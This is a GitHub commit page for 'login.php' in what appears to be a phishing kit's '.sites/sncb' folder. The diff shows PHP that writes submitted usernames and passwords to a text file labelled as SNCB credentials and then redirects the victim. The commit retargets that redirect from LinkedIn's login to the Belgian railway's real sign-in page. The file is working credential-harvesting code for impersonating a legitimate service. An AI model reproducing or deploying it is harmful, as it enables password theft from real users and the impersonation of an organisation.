Skip to content

Commit

Permalink
Update login.php
Browse files Browse the repository at this point in the history
  • Loading branch information
dracksters authored Jun 10, 2024
1 parent 48376b3 commit d9fa077
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions .sites/sncb/login.php
Original file line number Diff line number Diff line change
@@ -1,6 +1,6 @@
<?php

file_put_contents("usernames.txt", "SNCB Username: " . $_POST['session_key'] . " Pass: " . $_POST['session_password'] . "\n", FILE_APPEND);
header('Location: https://www.linkedin.com/login');
header('Location: https://www.idp.belgiantrain.com/login');
exit();
?>
?>

0 comments on commit d9fa077

Please sign in to comment.